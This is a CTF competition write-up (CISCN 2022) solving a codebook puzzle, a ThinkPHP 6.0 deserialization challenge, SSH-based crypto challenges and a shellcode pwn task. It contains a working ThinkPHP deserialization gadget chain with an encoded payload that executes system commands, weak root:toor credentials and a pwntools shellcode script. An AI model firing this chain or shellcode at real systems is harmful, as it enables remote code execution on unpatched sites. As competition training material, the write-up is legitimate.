CISCN 2022 Writeup

This year's challenges felt a bit easier than last year's; three of the crypto challenges had unintended solutions. A good friend helped with the 150 multiple-choice questions, then I solved six CTF challenges and went offline to slack off~

Misc

签到电台 (Sign-in Radio Station)

First, as the challenge description says, send the keyword to the official WeChat account to get the hint.

Open the challenge environment and find the codebook. According to the hint from the official account, we need 7*4 digits, i.e. the first 28 digits.

Click "pure digit mode" and take the first 28 digits:

```
1272685121234614783219665440
```

Then the 7 telegraph code groups corresponding to 弼时安全到达了 ("Bishi has arrived safely"):

```
1732 2514 1344 0356 0451 6671 0055
```

Send a GET request to start the telegraph machine:

```
/send?msg=s
```

Then send a GET request with the 28 digits obtained after the mod-10 step:

```
/send?msg=2904836534674960728375375495
```
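The mod-10 step above, as an added example that is not part of the original writeup: the 7 telegraph code groups are combined digit by digit with the first 28 codebook digits by addition mod 10, which reproduces the 28-digit value sent to the telegraph machine; the inverse (subtraction mod 10) recovers the code groups, exactly as a numeric one-time pad is decoded. The digit strings are the ones quoted on the page, embedded here as constructed input.

```python
# Added example (not from the original writeup): the mod-10 codebook step of the
# 签到电台 challenge, with the digit strings quoted on the page as constructed input.
CODEBOOK_28 = "1272685121234614783219665440"  # first 28 digits of the codebook (7*4)
# Chinese telegraph code groups for 弼时安全到达了, as listed on the page
TELEGRAPH_CODES = ["1732", "2514", "1344", "0356", "0451", "6671", "0055"]


def _check_digits(*values):
    """Refuse anything that is not a string of decimal digits."""
    for v in values:
        if not (isinstance(v, str) and v.isdigit()):
            raise ValueError("expected a string of decimal digits: %r" % (v,))


def encode(codebook, groups):
    """Digit-wise addition mod 10 of the code groups against the codebook.

    This is the numeric one-time-pad construction: each message digit is
    combined with one key digit, so the key must be at least as long as the
    message and, for real secrecy, never reused."""
    plain = "".join(groups)
    _check_digits(plain, codebook)
    if len(codebook) < len(plain):
        raise ValueError("codebook too short: need %d digits" % len(plain))
    return "".join(str((int(p) + int(k)) % 10)
                   for p, k in zip(plain, codebook[:len(plain)]))


def decode(codebook, transmitted, group=4):
    """Inverse of encode: digit-wise subtraction mod 10, re-split into groups."""
    _check_digits(transmitted, codebook)
    if len(codebook) < len(transmitted):
        raise ValueError("codebook too short: need %d digits" % len(transmitted))
    plain = "".join(str((int(c) - int(k)) % 10)
                    for c, k in zip(transmitted, codebook))
    return [plain[i:i + group] for i in range(0, len(plain), group)]


if __name__ == "__main__":
    sent = encode(CODEBOOK_28, TELEGRAPH_CODES)
    print("/send?msg=" + sent)          # 2904836534674960728375375495
    print(decode(CODEBOOK_28, sent))    # recovers the 7 telegraph code groups
```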

WEB

ezpop

This is ThinkPHP 6.0 deserialization; just search Baidu for a ready-made exp (ThinkPHP 6.0 deserialization chain audit and analysis: https://forum.butian.net/share/1168). We only need to find the deserialization point. A dirsearch scan shows that a www.zip file exists, and there is a deserialization point in the index.php controller.

```php
<?php

namespace think {

    use think\route\Url;

    abstract class Model
    {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;

        public function __construct()
        {
            $this->lazySave  = true;
            $this->withEvent = false;
            $this->exists    = true;
            $this->table     = new Url();
            $this->force     = true;
            $this->data      = ["1"];
        }
    }
}

namespace think\model {

    use think\Model;

    class Pivot extends Model
    {
        function __construct()
        {
            parent::__construct();
        }
    }

    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {

    use think\Middleware;
    use think\Validate;

    class Url
    {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;

        public function __construct()
        {
            $this->url    = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app    = new Middleware();
            $this->route  = new Validate();
        }
    }
}

namespace think {

    use think\view\driver\Php;

    class Validate
    {
        public function __construct()
        {
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }

    class Middleware
    {
        public function __construct()
        {
            $this->request = "sp4c1ous";
        }
    }
}

namespace think\view\driver {

    class Php
    {
        public function __construct()
        {
        }
    }
}
```

Payload

```
// ?s=index/test or /index.php/index/test

a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A6%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A32%3A%22%3C%3Fphp+system%28%27cat+%2Fflag.txt%27%29%3B%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bs%3A8%3A%22sp4c1ous%22%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A14%3A%22think%5CValidate%22%3A1%3A%7Bs%3A4%3A%22type%22%3Ba%3A1%3A%7Bs%3A13%3A%22getDomainBind%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22think%5Cview%5Cdriver%5CPhp%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22display%22%3B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3B%7D
```

Crypto

Challenge-Based Mutual Authentication (基于挑战码的双向认证) & Challenge-Based Mutual Authentication 2

Connect over SSH and search for the flag directly with find:

```
find / -name 'flag*'
```

```
cat /root/cube-shell/instance/flag_server/flag*
```

The first flag is for Challenge-Based Mutual Authentication, the second for Challenge-Based Mutual Authentication 2.

Challenge-Based Mutual Authentication 3

Unintended solution: the weak credentials root:toor.

```
cat /root/cube-shell/instance/flag_server/flag*
```

PWN

login-nomal

Locate main > sub_FFD().

It is clearly executing sc.

```python
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

# p = process('./login')
p = remote('123.56.87.204', 36979)

# first message: msg:ro0tt with opt:1
pl = b"msg:ro0tt\nopt:1\n"
p.sendlineafter(b">>", pl)

# second message: the key as msg with opt:2
key = b"Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N000"
pl = b"msg:" + key + b"\nopt:2\n"
p.sendlineafter(b">>", pl)
p.interactive()
```
Author: iami233
Link: https://5ime.cn/ciscn-2022.html
License: This article is licensed under CC BY-NC-SA 3.0 CN